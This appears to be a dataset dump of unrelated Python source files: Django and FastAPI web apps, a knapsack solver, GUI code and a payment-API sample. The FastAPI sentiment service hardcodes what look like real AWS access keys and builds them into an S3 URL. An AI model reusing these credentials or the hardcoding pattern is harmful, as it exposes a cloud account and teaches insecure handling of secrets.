cache\n sys.modules[__name__]._cache[:] = []\n sys.modules[__name__]._use_cache = False\n\n self.refresh()\n\n def on_stop_pressed(self):\n button = self.data[\"button\"][\"stop\"]\n button.setText(\"Stopping..\")\n button.setEnabled(False)\n\n self.data[\"state\"][\"running\"] = False\n\n def on_load_pressed(self):\n button = self.data[\"button\"][\"load\"]\n if not button.isEnabled():\n return\n\n assets_model = self.data[\"model\"][\"assets\"]\n subsets_model = self.data[\"model\"][\"subsets\"]\n autoclose_checkbox = self.data[\"button\"][\"autoclose\"]\n\n asset_item = assets_model.currentItem()\n\n for subset_item in subsets_model.selectedItems():\n\n if subset_item is None:\n return\n\n asset = asset_item.data(AssetRole)\n subset = subset_item.data(SubsetRole)\n assert asset\n assert subset\n\n try:\n api.registered_host().load(asset, subset)\n\n except ValueError as e:\n self.echo(e)\n raise\n\n except NameError as e:\n self.echo(e)\n raise\n\n # Catch-all\n except Exception as e:\n self.echo(\"Program error: %s\" % str(e))\n raise\n\n if autoclose_checkbox.checkState():\n self.close()\n\n def echo(self, message):\n widget = self.data[\"label\"][\"message\"]\n widget.setText(str(message))\n widget.show()\n print(message)\n\n def closeEvent(self, event):\n print(\"Good bye\")\n self.data[\"state\"][\"running\"] = False\n return super(Window, self).closeEvent(event)\n\n\ndef show(root=None, debug=False):\n \"\"\"Display Loader GUI\n\n Arguments:\n debug (bool, optional): Run loader in debug-mode,\n defaults to False\n\n \"\"\"\n\n if self._window:\n self._window.close()\n del(self._window)\n\n try:\n widgets = QtWidgets.QApplication.topLevelWidgets()\n widgets = dict((w.objectName(), w) for w in widgets)\n parent = widgets[\"MayaWindow\"]\n except KeyError:\n parent = None\n\n # Debug fixture\n fixture = 
api.fixture(assets=[\"Ryan\",\n \"Strange\",\n \"Blonde_model\"])\n\n with fixture if debug else lib.dummy():\n with lib.application():\n window = Window(parent)\n window.show()\n\n window.refresh()\n\n self._window = window\n","sub_path":"mindbender/tools/loader/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"368565414","text":"import os #For commands\nimport sys #For who-knows-what\n\ninterfaces = {}\nprint('INTERFACES:')\nif sys.platform.startswith('win'):\n print('\\tWindows OS features available')\n interfaces['os'] = 'win'\nelif sys.platform.startswith('linux') or os.platform.startswith('darwin'):\n print('\\t*nix features available')\n interfaces['os'] = '*nix'\nelse:\n print('\\tOS-specific interface not available')\n interfaces['os'] = None\n\ntry:\n import requests #For APIs\n interfaces['web'] = True\n print('\\tWeb API interface available')\nexcept ImportError:\n print('\\tWeb API interface not available')\n interfaces['web'] = False\ntry:\n import Skype4Py #For skype interfacing\n interfaces['skype'] = True\n print('\\tSkype interface available')\nexcept ImportError:\n print('\\tSkype interface not available.')\n interfaces['skype'] = False\n\ntry:\n import tkMessageBox #For skype interfacing\n interfaces['messagebox'] = True\n print('\\tMessage Box interface available')\nexcept ImportError:\n print('\\tMessage Box interface not available.')\n interfaces['messagebox'] = False\n\nif interfaces['os'] == 'win':\n try:\n import speech #Not available on all platforms and not in the standard library, but useful\n interfaces['speech'] = True\n print('\\tVoice interface available')\n except ImportError:\n print('\\tVoice interface not available')\n interfaces['speech'] = False\n","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"632461013","text":"from django.conf.urls import url\nfrom .views import AddCartView, CartInfoView, UpdateCartView, DeleteCartView\nfrom utils.login import login_required\napp_name = 'cart'\nurlpatterns = [\n url(r'^add$', AddCartView.as_view(), name='add'),\n # 只有登录的用户才有购物车\n url(r'^$', login_required(CartInfoView.as_view()), name='cart'),\n url(r'^update$', login_required(UpdateCartView.as_view()), name='update'),\n url(r'^delete$', login_required(DeleteCartView.as_view()), name='delete')\n]\n","sub_path":"apps/cart/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"304912313","text":"\"\"\"dataWall URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.contrib import admin\nfrom django.conf.urls import patterns, include, url\nfrom dataWall import views\nfrom django.conf import settings\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n\turl(r'^$', 'dataWall.views.home', name='home'),\n\n\t#taxa pages\n\turl(r'^bats/$', 'dataWall.views.bats', name='bats'),\n\turl(r'^birds/$', 'dataWall.views.birds', name='birds'),\n\turl(r'^herps/$', 'dataWall.views.herps', name='herps'),\n\turl(r'^large-mammals/$', 'dataWall.views.largeMammals', name='large-mammals'),\n\turl(r'^habitat/$', 'dataWall.views.habitat', name='habitat'),\n\turl(r'^gis/$', 'dataWall.views.gis', name='gis'),\n\t\n\t#media\n\turl(r'^media/(?P<path>.*)$', 'django.views.static.serve',{'document_root': settings.MEDIA_ROOT}),\n\t\n\t#unused at the moment\n\turl(r'^datawall/$', 'dataWall.views.datawall', name='datawall'),\n\t#url(r'^dataselect/$', 'dataWall.views.dataselect', name='dataselect'),\n\t#url(r'^speciesLists/$', 'dataWall.views.speciesLists', name='speciesList'),\n\t#url(r'^results/$', 'dataWall.views.results', name='results'),\n\n\t\n]\n","sub_path":"dataWall/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"430054629","text":"# 🚨 Don't change the code below 👇\nprint(\"Welcome to Daniel's Python Pizza Deliveries!\")\nsize = input(\"What size pizza do you want? S, M, or L \")\nadd_pepperoni = input(\"Do you want pepperoni? Y or N \")\nextra_cheese = input(\"Do you want extra cheese? Y or N \")\n# 🚨 Don't change the code above 👆\n\n#Write your code below this line 👇\n\nbill = 0\n\nif size == \"S\":\n bill = 15\n\nelif size == \"M\":\n bill = 20\n\nelse:\n bill = 25\n\nif add_pepperoni == \"Y\":\n if size == \"S\":\n bill += 2\n\n else:\n bill += 3\n\nif extra_cheese == \"Y\":\n bill += 1\n\nprint(f\"The final price of your pizza is £{bill}\")\nprint(\"Thank you for your patronage. \")\n\n\n","sub_path":"Pizza Ordering.py","file_name":"Pizza Ordering.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"441625224","text":"import functools\n\nfrom django import http\nfrom django.db.models import Q\nfrom django.contrib import messages\nfrom django.shortcuts import get_object_or_404, redirect\n\nimport jingo\nfrom tower import ugettext_lazy as _lazy, ugettext as _\n\nimport amo.utils\nfrom amo.decorators import login_required\nfrom amo.urlresolvers import reverse\nfrom access import acl\nfrom addons.models import Addon\nfrom addons.views import BaseFilter\nfrom tags.models import Tag\nfrom translations.query import order_by_translation\nfrom .models import Collection, CollectionAddon, CollectionUser, CollectionVote\nfrom . 
import forms\n\n\ndef owner_required(f=None, require_owner=True):\n \"\"\"Requires collection to be owner, by someone.\"\"\"\n\n def decorator(func):\n @functools.wraps(func)\n def wrapper(request, username, slug, *args, **kw):\n collection = get_object_or_404(Collection,\n author__nickname=username,\n slug=slug)\n\n if acl.check_collection_ownership(request, collection,\n require_owner=require_owner):\n return func(request, collection, username, slug, *args, **kw)\n else:\n return http.HttpResponseForbidden(\n _(\"This is not the collection you are looking for.\"))\n return wrapper\n\n if f:\n return decorator(f)\n else:\n return decorator\n\n\ndef legacy_redirect(request, uuid):\n # Nicknames have a limit of 30, so len == 36 implies a uuid.\n key = 'uuid' if len(uuid) == 36 else 'nickname'\n c = get_object_or_404(Collection.objects, **{key: uuid})\n return redirect(c.get_url_path())\n\n\ndef legacy_directory_redirects(request, page):\n sorts = {'editors_picks': 'featured', 'popular': 'popular'}\n loc = base = reverse('collections.list')\n if page in sorts:\n loc = amo.utils.urlparams(base, sort=sorts[page])\n elif request.user.is_authenticated():\n if page == 'mine':\n loc = reverse('collections.user', args=[request.amo_user.nickname])\n elif page == 'favorites':\n loc = reverse('collections.detail',\n args=[request.amo_user.nickname, 'favorites'])\n return redirect(loc)\n\n\nclass CollectionFilter(BaseFilter):\n opts = (('featured', _lazy('Featured')),\n ('popular', _lazy('Popular')),\n ('rating', _lazy('Highest Rated')),\n ('created', _lazy('Recently Added')))\n\n def filter(self, field):\n qs = self.base_queryset\n if field == 'featured':\n return qs.filter(type=amo.COLLECTION_FEATURED)\n elif field == 'followers':\n return qs.order_by('-weekly_subscribers')\n elif field == 'rating':\n return qs.order_by('-rating')\n else:\n return qs.order_by('-created')\n\n\ndef collection_listing(request):\n app = Q(application=request.APP.id) | Q(application=None)\n base = Collection.objects.listed().filter(app)\n filter = CollectionFilter(request, base, key='sort', default='popular')\n collections = amo.utils.paginate(request, filter.qs)\n votes = get_votes(request, collections.object_list)\n return jingo.render(request, 'bandwagon/collection_listing.html',\n {'collections': collections, 'filter': filter,\n 'collection_votes': votes})\n\n\ndef get_votes(request, collections):\n if not request.user.is_authenticated():\n return {}\n q = CollectionVote.objects.filter(\n user=request.amo_user, collection__in=[c.id for c in collections])\n return dict((v.collection_id, v) for v in q)\n\n\ndef user_listing(request, username):\n return http.HttpResponse()\n\n\nclass CollectionAddonFilter(BaseFilter):\n opts = (('added', _lazy('Added')),\n ('popular', _lazy('Popularity')),\n ('name', _lazy('Name')))\n\n def filter(self, field):\n if field == 'added':\n return self.base_queryset.order_by('collectionaddon__created')\n elif field == 'name':\n return order_by_translation(self.base_queryset, 'name')\n elif field == 'popular':\n return (self.base_queryset.order_by('-weekly_downloads')\n .with_index(addons='downloads_type_idx'))\n\n\ndef collection_detail(request, username, slug):\n c = get_object_or_404(Collection.objects,\n author__nickname=username, slug=slug)\n base = c.addons.all() & Addon.objects.listed(request.APP)\n filter = CollectionAddonFilter(request, base,\n key='sort', default='popular')\n notes = get_notes(c)\n count = CollectionAddon.objects.filter(\n Addon.objects.valid_q(prefix='addon__'), 
collection=c.id).count()\n addons = amo.utils.paginate(request, filter.qs, per_page=15, count=count)\n\n if c.author_id:\n qs = Collection.objects.listed().filter(author=c.author)\n others = amo.utils.randslice(qs, limit=4, exclude=c.id)\n else:\n others = []\n\n perms = {\n 'view_stats': acl.check_ownership(request, c, require_owner=False),\n }\n\n tag_ids = c.top_tags\n tags = Tag.objects.filter(id__in=tag_ids) if tag_ids else []\n return jingo.render(request, 'bandwagon/collection_detail.html',\n {'collection': c, 'filter': filter,\n 'addons': addons, 'notes': notes,\n 'author_collections': others, 'tags': tags,\n 'perms': perms})\n\n\ndef get_notes(collection):\n # This might hurt in a big collection with lots of notes.\n # It's a generator so we don't evaluate anything by default.\n notes = CollectionAddon.objects.filter(collection=collection,\n comments__isnull=False)\n rv = {}\n for note in notes:\n rv[note.addon_id] = note.comments\n yield rv\n\n\n@login_required\ndef collection_vote(request, username, slug, direction):\n c = get_object_or_404(Collection.objects,\n author__nickname=username, slug=slug)\n if request.method != 'POST':\n return redirect(c.get_url_path())\n\n vote = {'up': 1, 'down': -1}[direction]\n cv, new = CollectionVote.objects.get_or_create(\n collection=c, user=request.amo_user, defaults={'vote': vote})\n\n if not new:\n if cv.vote == vote: # Double vote => cancel.\n cv.delete()\n else:\n cv.vote = vote\n cv.save()\n\n if request.is_ajax():\n return http.HttpResponse()\n else:\n return redirect(c.get_url_path())\n\n\ndef initial_data_from_request(request):\n return dict(author=request.amo_user, application_id=request.APP.id)\n\n\n@login_required\ndef add(request):\n \"Displays/processes a form to create a collection.\"\n data = {}\n if request.method == 'POST':\n form = forms.CollectionForm(\n request.POST, request.FILES,\n initial=initial_data_from_request(request))\n aform = forms.AddonsForm(request.POST)\n if form.is_valid():\n collection = form.save()\n\n if aform.is_valid():\n aform.save(collection)\n return http.HttpResponseRedirect(collection.get_url_path())\n else:\n data['addons'] = aform.clean_addon()\n data['comments'] = aform.clean_addon_comment()\n else:\n form = forms.CollectionForm()\n\n data['form'] = form\n return jingo.render(request, 'bandwagon/add.html', data)\n\n\ndef ajax_new(request):\n form = forms.CollectionForm(request.POST or None,\n initial={'author': request.amo_user,\n 'application_id': request.APP.id},\n )\n\n if request.method == 'POST':\n\n if form.is_valid():\n collection = form.save()\n CollectionUser(collection=collection, user=request.amo_user).save()\n addon_id = request.REQUEST['addon_id']\n a = Addon.objects.get(pk=addon_id)\n collection.add_addon(a)\n\n return http.HttpResponseRedirect(reverse('collections.ajax_list')\n + '?addon_id=%s' % addon_id)\n\n return jingo.render(request, 'bandwagon/ajax_new.html', {'form': form})\n\n\n@login_required\ndef ajax_list(request):\n # Get collections associated with this user\n collections = request.amo_user.collections.manual()\n addon_id = int(request.GET['addon_id'])\n\n for collection in collections:\n # See if the collections contains the addon\n if addon_id in collection.addons.values_list('id', flat=True):\n collection.has_addon = True\n\n return jingo.render(request, 'bandwagon/ajax_list.html',\n {'collections': collections})\n\n\ndef _ajax_add_remove(request, op):\n id = request.POST['id']\n addon_id = request.POST['addon_id']\n\n c = Collection.objects.get(pk=id)\n\n if not 
c.owned_by(request.amo_user):\n return http.HttpResponseForbidden()\n\n a = Addon.objects.get(pk=addon_id)\n\n if op == 'add':\n c.add_addon(a)\n else:\n c.remove_addon(a)\n\n # redirect\n return http.HttpResponseRedirect(reverse('collections.ajax_list') +\n '?addon_id=%s' % addon_id)\n\n\ndef ajax_add(request):\n return _ajax_add_remove(request, 'add')\n\n\ndef ajax_remove(request):\n return _ajax_add_remove(request, 'remove')\n\n\n@login_required\n@owner_required\ndef edit(request, collection, username, slug):\n if request.method == 'POST':\n form = forms.CollectionForm(request.POST, request.FILES,\n initial=initial_data_from_request(request),\n instance=collection)\n if form.is_valid():\n collection = form.save()\n\n return http.HttpResponseRedirect(collection.get_url_path())\n else:\n form = forms.CollectionForm(instance=collection)\n\n data = dict(collection=collection,\n form=form,\n username=username,\n slug=slug)\n return jingo.render(request, 'bandwagon/edit.html', data)\n\n\n@login_required\n@owner_required(require_owner=False)\ndef edit_addons(request, collection, username, slug):\n if request.method == 'POST':\n form = forms.AddonsForm(request.POST)\n if form.is_valid():\n form.save(collection)\n return http.HttpResponseRedirect(collection.get_url_path())\n\n data = dict(collection=collection, username=username, slug=slug)\n return jingo.render(request, 'bandwagon/edit_addons.html', data)\n\n\n@login_required\n@owner_required\ndef edit_contributors(request, collection, username, slug):\n is_admin = acl.action_allowed(request, 'Admin', '%')\n\n data = dict(collection=collection, username=username, slug=slug,\n is_admin=is_admin)\n\n if is_admin:\n initial = dict(type=collection.type,\n application=collection.application_id)\n data['admin_form'] = forms.AdminForm(initial=initial)\n\n if request.method == 'POST':\n if is_admin:\n admin_form = forms.AdminForm(request.POST)\n if admin_form.is_valid():\n admin_form.save(collection)\n\n form = forms.ContributorsForm(request.POST)\n if form.is_valid():\n form.save(collection)\n messages.success(request, _('Your collection has been updated.'))\n if form.cleaned_data['new_owner']:\n return http.HttpResponseRedirect(collection.get_url_path())\n return http.HttpResponseRedirect(\n reverse('collections.edit_contributors',\n args=[username, slug]))\n\n return jingo.render(request, 'bandwagon/edit_contributors.html', data)\n\n\n@login_required\ndef delete(request, username, slug):\n collection = get_object_or_404(Collection, author__nickname=username,\n slug=slug)\n\n is_admin = acl.action_allowed(request, 'Admin', '%')\n\n if not (collection.is_owner(request.amo_user) or is_admin):\n return http.HttpResponseForbidden(\n _('This is not the collection you are looking for.'))\n\n data = dict(collection=collection, username=username, slug=slug,\n is_admin=is_admin)\n\n if request.method == 'POST':\n if request.POST['sure'] == '1':\n collection.delete()\n url = reverse('collections.user', args=[username])\n return http.HttpResponseRedirect(url)\n else:\n return http.HttpResponseRedirect(collection.get_url_path())\n\n return jingo.render(request, 'bandwagon/delete.html', data)\n","sub_path":"apps/bandwagon/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"370948851","text":"import collections\nfrom django.db.models import fields\nfrom rest_framework import serializers\nfrom core.models import Tag, Collection, 
Bookmark\n\n\nclass TagSerializer(serializers.ModelSerializer):\n class Meta:\n model = Tag\n fields = '__all__'\n\n\nclass CollectionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Collection\n fields = ['name']\n\n\nclass BookMarkSerializer(serializers.ModelSerializer):\n tags = TagSerializer(many=True)\n collection = CollectionSerializer(many=True)\n class Meta:\n model = Bookmark\n fields = ['title', 'url', 'tags', 'collection']","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"175934149","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport random\r\nimport math\r\nimport time\r\n\r\nnumber = 30\r\ncapacity = 10149\r\nweight = [508,1021,1321,111,1098,1196,204,939,1107,399,474,719,803,1054,1781,\r\n 525,1050,1362,530,641,903,432,583,894,754,806,1241,1056,1092,1545]\r\nprofit = [408,921,1329,11,998,1009,104,839,943,299,374,673,703,954,1657,\r\n 425,950,1375,430,541,971,332,483,815,654,706,1360,956,992,1948]\r\n\r\n#动态规划算法求解0-1背包问题\r\nclass onezerobag:\r\n def __init__(self, w, v, c):\r\n self.w = w\r\n self.v = v\r\n self.c = c\r\n\r\n def dynamic_programming(self):\r\n self.v = np.array(self.v)\r\n self.w = np.array(self.w)\r\n num = self.v.size #物体数量\r\n values = np.zeros([num+1, self.c+1])\r\n for i in range(values.shape[0]):\r\n values[i, 0] = 0\r\n for i in range(values.shape[1]):\r\n values[0, i] = 0\r\n\r\n for i in range(1, values.shape[0], 1):\r\n for j in range(1, values.shape[1], 1):\r\n if(self.w[i - 1] > j): #如果物体重量大于包当前重量,不装进去\r\n values[i,j] = values[i-1, j]\r\n else:\r\n if(values[i-1, j] > values[i-1, j-self.w[i - 1]] + self.v[i - 1]):\r\n values[i,j] = values[i-1, j]\r\n else:\r\n values[i,j] = values[i-1, j-self.w[i - 1]] + self.v[i - 1]\r\n return values\r\n\r\n def load_which(self, values):\r\n h = values.shape[0]\r\n\r\n c = self.c\r\n which = []\r\n\r\n for i in range(h-1, 0, -1):\r\n if(values[i,c] == values[i-1,c]):\r\n continue\r\n else:\r\n which.append(i)\r\n c = c - self.w[i - 1]\r\n which.reverse()\r\n return which, values[values.shape[0]-1, values.shape[1]-1]\r\n\r\n#回溯算法求解0-1背包问题\r\nclass backTrackingMethod:\r\n def __init__(self, w, v, c, cw, cp, bestp):\r\n self.w = np.array(w)\r\n self.v = np.array(v)\r\n self.c = c\r\n self.cw = cw\r\n self.cp = cp\r\n self.bestp = bestp\r\n\r\n def value_per(self):\r\n per = self.v / self.w\r\n sor = np.sort(per)\r\n index = np.argsort(per)\r\n\r\n list = []\r\n for i in sor:\r\n list.append(i)\r\n list.reverse()\r\n\r\n list1 = []\r\n for i in index:\r\n list1.append(i)\r\n list1.reverse()\r\n index = np.array(list1)\r\n\r\n\r\n a = self.v.copy()\r\n b = self.w.copy()\r\n for i in range(self.v.size):\r\n a[i] = self.v[index[i]]\r\n b[i] = self.w[index[i]]\r\n\r\n self.v = a.copy()\r\n self.w = b.copy()\r\n\r\n return self.v, self.w, index\r\n\r\n def bound(self, i):\r\n leftw = self.c - self.cw\r\n bestbound = self.cp\r\n while (i < self.v.size):\r\n if (self.w[i] <= leftw):\r\n bestbound = bestbound + self.v[i]\r\n leftw = leftw - self.w[i]\r\n i += 1\r\n else:\r\n bestbound = bestbound + self.v[i] / self.w[i] * leftw\r\n break\r\n return bestbound\r\n\r\n def back_tracking(self, i, visit):\r\n\r\n if(i > self.v.size-1):\r\n self.bestp = self.cp\r\n return\r\n\r\n if(self.cw + self.w[i] < self.c):\r\n self.cw += self.w[i]\r\n self.cp += self.v[i]\r\n visit[i] = 1\r\n self.back_tracking(i+1, visit)\r\n self.cw -= self.w[i]\r\n 
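# undo the tentative inclusion of item i (restore the running weight and profit) before exploring the branch that excludes it\r\n            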
self.cp -= self.v[i]\r\n else:\r\n visit[i] = 0\r\n\r\n if(self.bound(i+1) >= self.bestp):\r\n self.back_tracking(i+1, visit)\r\n return visit, self.bestp\r\n\r\n# 用户选择解决0-1背包问题的方法\r\nprint('请选择解决的方法:')\r\nprint('选择动态规划解决请按 1 :')\r\nprint('选择回溯法解决请按 2 :')\r\nprint('请输入你的选项:')\r\nx=input()\r\nif x=='1':\r\n data = open(\"result.txt\", \"w\") # 创建保存结果文件\r\n data.write('\\n背包中所装物品为:') # 写入文件\r\n start = time.time()\r\n question1 = onezerobag(weight, profit, capacity)\r\n x = question1.load_which(question1.dynamic_programming())\r\n end = time.time()\r\n print(\"\\n\\n***动态规划算法***\")\r\n print(\"最优解序号为:\")\r\n for i in x[0]:\r\n print('第',i,'个', end=\" \")\r\n s=str(i) + ' '\r\n data.write(s)\r\n a = x[1]\r\n print(\"\\n最大价值为:\", a)\r\n print(\"\\n循环运行时间:%.2f秒\" % (end - start))\r\n\r\n # 任意一组D{0-1} KP数据的最优解、求解时间和解向量可保存为txt文件或导出EXCEL文件。\r\n data.write(\"\\n循环运行时间:\")\r\n data.write(str(end - start))\r\n data.write(\"秒\")\r\n data.close()\r\nelif x=='2':\r\n data = open(\"result.txt\", \"w\") # 创建保存结果文件\r\n data.write('\\n背包中所装物品为:') # 写入文件\r\n visit = np.zeros(number)\r\n start = time.time()\r\n question = backTrackingMethod(weight, profit, capacity, cw = 0, cp = 0 ,bestp=0)\r\n weight, profit, index = question.value_per()\r\n visit, best = question.back_tracking(0, visit)\r\n end = time.time()\r\n print(\"\\n循环运行时间:%.2f秒\" % (end - start))\r\n list = []\r\n for i in range(visit.size):\r\n if(visit[i] != 0):\r\n list.append(index[i]+1)\r\n print(\"\\n\\n***回溯算法***\")\r\n print(\"最优解序号为:\")\r\n for a in sorted(list):\r\n print('第', a, '个', end=\" \")\r\n s = str(i) + ' '\r\n data.write(s)\r\n print(\"\\n最大价值为:\", best)\r\n # 任意一组D{0-1} KP数据的最优解、求解时间和解向量可保存为txt文件或导出EXCEL文件。\r\n data.write(\"\\n循环运行时间:\")\r\n data.write(str(end - start))\r\n data.write(\"秒\")\r\n data.close()\r\nelse:\r\n print(\"输入错误!\")\r\n\r\n#按性价比进行非递增排序\r\nw_np = np.array(weight)\r\np_np = np.array(profit)\r\nratio = p_np / w_np\r\nprint(\"价值与重量之比:\")\r\nfor a in ratio:\r\n print(format(a, '.3f'), end=\" \")\r\n\r\nprint(\"\\n\\n非递增排序后:\")\r\nres = sorted(ratio, reverse=True)\r\nfor b in res:\r\n print(format(b, '.3f'), end=\" \")\r\n\r\n#绘制散点图\r\nplt.figure(figsize=(8, 6), dpi=80)\r\nplt.scatter(weight, profit, s=20)\r\nplt.xlabel(\"Weight\", fontsize=12, color=\"r\")\r\nplt.ylabel(\"Profit\", fontsize=12, color='r')\r\nplt.show()\r\n","sub_path":"BackTrack.py","file_name":"BackTrack.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"76202626","text":"\n# Import Needed Libraries\nimport uvicorn\nimport pandas as pd\nfrom fastapi import FastAPI,Query\nfrom pydantic import BaseModel\nimport tensorflow as tf\nimport logging\nfrom pathlib import Path\nimport os\nimport numpy as np\nimport boto3\nfrom smart_open import smart_open\nimport tensorflow_text\nfrom typing import List\nfrom fastapi.middleware.cors import CORSMiddleware\n\nimport json\nfrom pydantic import BaseModel\nimport logging\n\n\n\n\n\n# Initiate app instance\napp = FastAPI()\n\norigins = [\n \"http://localhost.tiangolo.com\",\n \"https://localhost.tiangolo.com\",\n \"http://localhost\",\n \"http://localhost:8080\",\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\ndef chunks(lst,n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i:i + n]\n\n\n@app.get('/')\ndef root():\n return {'message':'Get Sentiment 
Predictions'}\n\n@app.get('/download')\ndef download_model():\n s3 = boto3.resource(\n service_name='s3',\n region_name='us-east-2',\n aws_access_key_id='AKIAJV5PIUOIYOJJ3VEQ', aws_secret_access_key='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')\n # select bucket\n local_dir = './Model/'\n bucket_name='prudhvics'\n prefix='model/'\n bucket = s3.Bucket(bucket_name)\n for obj in bucket.objects.filter(Prefix=prefix):\n target = obj.key if local_dir is None \\\n else os.path.join(local_dir, os.path.relpath(obj.key, prefix))\n if not os.path.exists(os.path.dirname(target)):\n os.makedirs(os.path.dirname(target))\n if obj.key[-1] == '/':\n continue\n bucket.download_file(obj.key, target)\n\n# Prediction endpoint\n@app.post('/predict')\ndef get_prediction(data: List[str]= Query(None)):\n data=data\n # Make predictions based on the incoming data and saved neural net\n model_path = './Model/'\n checkpoint = tf.saved_model.load(model_path)\n f = checkpoint.signatures[\"serving_default\"]\n predict = f(tf.constant([data]))\n value = list(predict.values())[0].numpy()\n # print(predict.values())\n value=[item for sublist in value for item in sublist]\n print(value)\n value=[round(float(i),3) for i in value]\n # preds = get_prediction(data)\n print(value)\n # Return the predicted class and the predicted probability\n return {'sentiment':value}\n#\ndef chunks(lst, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i:i + n]\n\n@app.get(\"/get_prediction\")\nasync def get_prediction(s3_url: str):\n\n\n\n aws_access_key_id = 'AKIAJV5PIUOIYOJJ3VEQ'\n aws_secret_access_key = 'LfR3OY+MWpXjZ91yTUK8I0MCmsCTOHzoHgAdGaoQ'\n bucket_name ='prudhvics'\n object_key = s3_url.split('//')[1].replace(bucket_name+'/','')\n path = 's3://{}:{}@{}/{}'.format(aws_access_key_id, aws_secret_access_key, bucket_name, object_key)\n df = pd.read_csv(smart_open(path),sep='\\n')\n df=df.dropna()\n df.columns = ['Text']\n #print(df)\n listtext=list(df[\"Text\"])\n listtext=listtext[:150]\n\n model_path = './Model/'\n checkpoint = tf.saved_model.load(model_path)\n f = checkpoint.signatures[\"serving_default\"]\n\n\n\n\n final_df=pd.DataFrame({\"Text\":[],\"metric\":[]})\n\n for lis in chunks(listtext,200):\n predict = f(tf.constant([lis]))\n value = list(predict.values())[0].numpy()\n #r = requests.post(\"http://localhost:8000/predict\",data=lis)\n #a = json.loads(value)\n copy_df=final_df[final_df[\"Text\"]=='~~~']\n copy_df[\"Text\"]=lis\n copy_df[\"metric\"]=value\n final_df=pd.concat([final_df,copy_df])\n\n #print(final_df)\n return {'Text':list(final_df['Text']),\n 'metric': list(final_df['metric'])}\n\nif __name__ == \"__main__\":\n # Run app with uvicorn with port and host specified. 
Host needed for docker port mapping\n uvicorn.run(app, port=8000, host=\"0.0.0.0\")\n\n","sub_path":"Assignment4/ModelServingAPI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25509353","text":"from CyberSource import *\r\nimport json\r\nimport os\r\nfrom importlib.machinery import SourceFileLoader\r\n\r\nconfig_file = os.path.join(os.getcwd(), \"data\", \"Configuration.py\")\r\nconfiguration = SourceFileLoader(\"module.name\", config_file).load_module()\r\n\r\n\r\ndef authentication_with_new_account():\r\n try:\r\n # Setting the json message body\r\n request = CheckPayerAuthEnrollmentRequest()\r\n client_reference = Riskv1authenticationsClientReferenceInformation(\"New Account\")\r\n request.client_reference_information = client_reference.__dict__\r\n\r\n order_information = Riskv1authenticationsOrderInformation()\r\n\t\t\r\n bill_to = Riskv1authenticationsOrderInformationBillTo(\"1 Market St\",\"Address 2\",\"CA\",\"US\",\"san francisco\",\"James\",\"Doe\",\"4158880000\",\"test@cybs.com\",\"94105\")\r\n\r\n amount_details = Riskv1decisionsOrderInformationAmountDetails(\"USD\")\r\n amount_details.total_amount = \"10.99\"\r\n\r\n order_information.bill_to = bill_to.__dict__\r\n order_information.amount_details = amount_details.__dict__\r\n\r\n payment_info = Riskv1authenticationsPaymentInformation()\r\n card = Riskv1authenticationsPaymentInformationCard(\"001\",\"12\",\"2025\",\"4000990000000004\")\r\n payment_info.card = card.__dict__\r\n request.payment_information = payment_info.__dict__\r\n\r\n request.order_information = order_information.__dict__\r\n\r\n customer_account = Riskv1authenticationsRiskInformationBuyerHistoryCustomerAccount()\r\n customer_account.creation_history = \"NEW_ACCOUNT\"\r\n\r\n account_history = Riskv1authenticationsRiskInformationBuyerHistoryAccountHistory()\r\n account_history.ship_address_usage_date = \"2017-05-06\"\r\n account_history.first_use_of_shipping_address = \"false\"\r\n\r\n buyer_history = Riskv1authenticationsRiskInformationBuyerHistory()\r\n buyer_history.customer_account = customer_account.__dict__\r\n buyer_history.account_history = account_history.__dict__\r\n\r\n risk_information = Riskv1authenticationsRiskInformation()\r\n risk_information.buyer_history = buyer_history.__dict__\r\n\r\n request.risk_information = risk_information.__dict__\r\n\r\n consumer_authentication_information = Riskv1authenticationsConsumerAuthenticationInformation(mcc = '', reference_id = '', transaction_mode = 'MOTO')\r\n\r\n request.consumer_authentication_information = consumer_authentication_information.__dict__\r\n\r\n message_body = json.dumps(request.__dict__)\r\n\r\n # Reading Merchant details from Configuration file\r\n 